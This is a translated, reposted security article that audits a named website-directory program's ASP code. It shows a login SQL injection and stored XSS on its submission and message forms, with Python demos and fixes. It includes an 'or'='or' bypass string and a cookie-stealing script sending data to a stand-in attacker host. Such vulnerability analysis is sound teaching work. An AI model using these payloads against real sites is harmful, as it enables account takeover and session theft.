Original article from www.2cto.com, reprinted by the Red Black Alliance.
You can discuss this article with the author here: http://bbs.2cto.com/read.php?tid=94372
A friend of mine on the Internet gave me a website navigation site and asked me to help publicize it. His site is powerful and has many more practical functions than sites such as hao123, so I assumed the program would be secure. After my friend packaged the program for me, I checked it and found some extremely low-level vulnerabilities. Let's look at them.
Login verification vulnerability. The program has a user login form, and because the login check is written carelessly, a classic 'or'='or' bypass is possible. Let's look at the source code.
The login address is http://nihao188.com/user/login.htm. Here is the code of the file that processes the form, login.asp.
<%
Dim pw, vtime, myname  ' declares three variables
myname = trim(request("username"))  ' the account name sent by the client is read through the Request object; no collection (Form, QueryString) is specified, so it is accepted from anywhere, and only surrounding spaces are trimmed
pw = md5(trim(request("pw")), 16)  ' same for the password: only spaces are trimmed, then it is MD5-hashed
vtime = request("vtime")
Set rs = server.createobject("adodb.recordset")
rs.open "select * from my_user where username='" & myname & "' and password='" & pw & "'", conn, 1, 3
' the trimmed username and the hashed password are spliced straight into the query
' the rest is omitted ------------------
I have added comments at the end of the lines for convenience.
After reading the code above, it is clear that an 'or'='or' style login bypass works directly. Note that the password goes through md5() before it reaches the query, so the injection has to be placed in the username field; the username is concatenated into the SQL string exactly as typed.
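To make the bypass concrete, here is an added example (my own code, not part of the original article or of the nihao188 program) that models login.asp in Python against an in-memory SQLite table. The table, the account "admin"/"s3cret", and the md5 helper are constructed for the example; the helper assumes the classic-ASP md5(str, 16) function returns the middle 16 hex characters of the digest, which is an assumption. The vulnerable function assembles the query the way login.asp does; the hardened one uses a parameterised query.

```python
import hashlib
import sqlite3


def asp_md5_16(password: str) -> str:
    """Model of the classic-ASP md5(str, 16) helper: the middle 16 hex
    characters of the MD5 digest (an assumption about that library)."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a my_user table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table my_user (id integer primary key, username text, password text)")
    conn.execute("insert into my_user (username, password) values (?, ?)",
                 ("admin", asp_md5_16("s3cret")))
    conn.commit()
    return conn


def build_login_sql(username: str, pw: str) -> str:
    """The query exactly as login.asp assembles it: trim, hash, concatenate."""
    return ("select * from my_user where username='" + username.strip()
            + "' and password='" + asp_md5_16(pw.strip()) + "'")


def vulnerable_login(conn: sqlite3.Connection, username: str, pw: str):
    """login.asp behaviour: user input spliced into the SQL string.
    Returns the matched username, or None when no row matches."""
    row = conn.execute(build_login_sql(username, pw)).fetchone()
    return row[1] if row else None


def safe_login(conn: sqlite3.Connection, username: str, pw: str):
    """Hardened form: a parameterised query, so the username is only ever data."""
    row = conn.execute(
        "select * from my_user where username=? and password=?",
        (username.strip(), asp_md5_16(pw.strip())),
    ).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    conn = make_db()
    payload = "' or '1'='1' or '"   # the "or = or" bypass, typed into the username box
    print(build_login_sql(payload, "anything"))
    print("vulnerable:", vulnerable_login(conn, payload, "anything"))  # admin
    print("safe:      ", safe_login(conn, payload, "anything"))        # None
```

With the payload in the username, the assembled WHERE clause reads `username='' or '1'='1' or '' and password='...'`; the `'1'='1'` term is always true, so the first row comes back regardless of the password. The parameterised version receives the same string and finds no account.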
That is the first vulnerability. The second: the homepage has a "submit new site" link, which leads to the page where a user submits a new site. This page has a cross-site scripting (XSS) vulnerability, and a payload stored here and viewed in the admin backend can be used to steal cookies or even plant a Trojan!!!
Let's look at the code for this page.
The address is http://www.nihao188.com/url.html
The form is processed by the file url.asp:
Set rs = server.createobject("adodb.recordset")
Login_UrlNmae = Request.Form("webname")
Login_Url = Request.Form("weburl")
Login_Class = Request.Form("webtype")
alexa = Request.Form("alexa")
Login_Email = Request.Form("email")
qq = Request.Form("qq")
friend = Request.Form("friend")
Login_Menu = Request.Form("Login_Menu")
If Login_Menu = "Add" then
    rs.open "select * from Login where Login_Url='" & Login_Url & "'", conn, 1, 3
    If not rs.eof and not rs.bof then
        Response.Write("<script language=javascript>alert('Your site has already been submitted, please do not submit it again!');this.location.href='/';</script>")
        Response.End()
    End if
    rs.close
    rs.open "select * from Login", conn, 1, 3
    rs.addnew
    rs("Login_UrlNmae") = Login_UrlNmae
    rs("Login_Url") = Login_Url
    rs("Login_Class") = Login_Class
    rs("alexa") = alexa
    rs("Login_Email") = Login_Email
    rs("qq") = qq
    rs("friend") = friend
From the code above, every submitted field is written into the database without any filtering, and Login_Url is also concatenated straight into the duplicate-check query in the same way as the login form.
The homepage also has a visitor message board, and it has a cross-site scripting vulnerability as well.
Address: http://www.nihao188.com/quality.html
The code is:
Message = trim(request("requireddescription"))
If Message = "" then
    Response.write "<SCRIPT language=JavaScript>alert('Please provide your comments and suggestions on nihao188 website navigation!');"
    Response.write "javascript:location.replace('/')</SCRIPT>"
Else
    Set rsAdd = Server.CreateObject("ADODB.Recordset")
    SQL = "select * from Message"
    rsAdd.open SQL, conn, 1, 3
    rsAdd.addnew
    rsAdd("Message") = Message
    rsAdd("date") = now()
    rsAdd.update
    rsAdd.close
    Response.write "<SCRIPT language=JavaScript>alert('Your message has been submitted! Thank you for your support!');"
    Response.write "javascript:location.replace('/')</SCRIPT>"
    Response.end
Again, only surrounding spaces are trimmed!!! The message is stored exactly as the visitor typed it, HTML tags included.
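Both url.asp and quality.asp follow the same pattern: store the input untouched, then let some other page (the admin backend, the message list) print it. The added example below is my own Python model of that flow and is not code from the original article or from the nihao188 program. The two tables, the sample submissions (one honest, one carrying a cookie-stealing payload) and the message-board post are constructed for the example; the backend page that lists the rows is assumed, since the article does not show it. `escape=False` reproduces the original behaviour, `escape=True` is the hardened form: HTML-encode every stored string before it goes into the page and, for the weburl field, only allow http(s) link targets.

```python
import html
import sqlite3
from urllib.parse import urlsplit

# Constructed sample input: one honest site submission and one whose site name
# is a cookie-stealing script and whose URL is a javascript: link.
SITE_SUBMISSIONS = [
    ("Example Site", "http://example.com/", "owner@example.com"),
    ("<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>",
     "javascript:alert(document.cookie)", "x@example.com"),
]
# Constructed message-board posts for quality.asp: a normal one and a payload.
MESSAGES = ["Nice directory!", '<img src=x onerror="alert(document.cookie)">']


def make_db() -> sqlite3.Connection:
    """Tables shaped like the ones url.asp and quality.asp write to."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table Login (Login_UrlNmae text, Login_Url text, Login_Email text)")
    conn.execute("create table Message (Message text)")
    return conn


def store_as_received(conn: sqlite3.Connection) -> None:
    """rs.addnew as in both handlers: the strings are stored exactly as received."""
    conn.executemany("insert into Login values (?, ?, ?)", SITE_SUBMISSIONS)
    conn.executemany("insert into Message values (?)", [(m,) for m in MESSAGES])
    conn.commit()


def safe_href(url: str) -> str:
    """Allow only http(s) link targets; javascript:, data: etc. become '#'."""
    return url if urlsplit(url).scheme in ("http", "https") else "#"


def render_backend(conn: sqlite3.Connection, escape: bool) -> str:
    """Assumed admin page listing the stored rows.
    escape=False echoes the data raw (the original behaviour);
    escape=True HTML-encodes text and validates link targets (hardened)."""
    enc = (lambda s: html.escape(s, quote=True)) if escape else (lambda s: s)
    link = safe_href if escape else (lambda u: u)
    out = ["<table>"]
    for name, url, email in conn.execute("select Login_UrlNmae, Login_Url, Login_Email from Login"):
        out.append('<tr><td>%s</td><td><a href="%s">%s</a></td><td>%s</td></tr>'
                   % (enc(name), link(url), enc(url), enc(email)))
    out.append("</table><ul>")
    for (msg,) in conn.execute("select Message from Message"):
        out.append("<li>%s</li>" % enc(msg))
    out.append("</ul>")
    return "\n".join(out)


def has_live_payload(page: str) -> bool:
    """Crude audit of rendered output: does any stored tag or javascript: link
    reach the browser as live markup rather than as encoded text?"""
    low = page.lower()
    return "<script" in low or "<img" in low or 'href="javascript:' in low


if __name__ == "__main__":
    conn = make_db()
    store_as_received(conn)
    print(render_backend(conn, escape=False))  # payloads render as live markup
    print(render_backend(conn, escape=True))   # payloads render as inert text
```

Encoding at output time is the fix that matters: trimming or blacklisting on the way in, as these handlers do, leaves the stored HTML intact for every page that later prints it. Note that HTML-encoding alone does not make a stored URL safe to put in an href, which is why the weburl field gets a scheme check as well.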
So the security of this program is still very problematic.
Finally, I did publicize the site:
http://www.nihao188.com/
The most popular browser home page of 2009: site navigation, a complete site directory, every practical site you need.
Thank you for your support. When reposting this article, please keep a clear link to the blog: http://hi.baidu.com/tongming133